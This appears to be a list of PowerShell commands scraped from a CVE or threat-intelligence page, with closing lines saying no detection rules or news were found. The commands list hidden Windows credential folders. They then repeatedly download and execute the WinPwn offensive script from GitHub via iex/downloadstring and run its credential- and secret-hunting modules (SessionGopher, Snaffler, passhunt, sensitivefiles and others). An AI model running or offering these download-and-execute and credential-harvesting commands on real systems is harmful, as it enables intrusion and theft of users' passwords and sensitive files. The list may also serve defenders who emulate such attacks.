$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.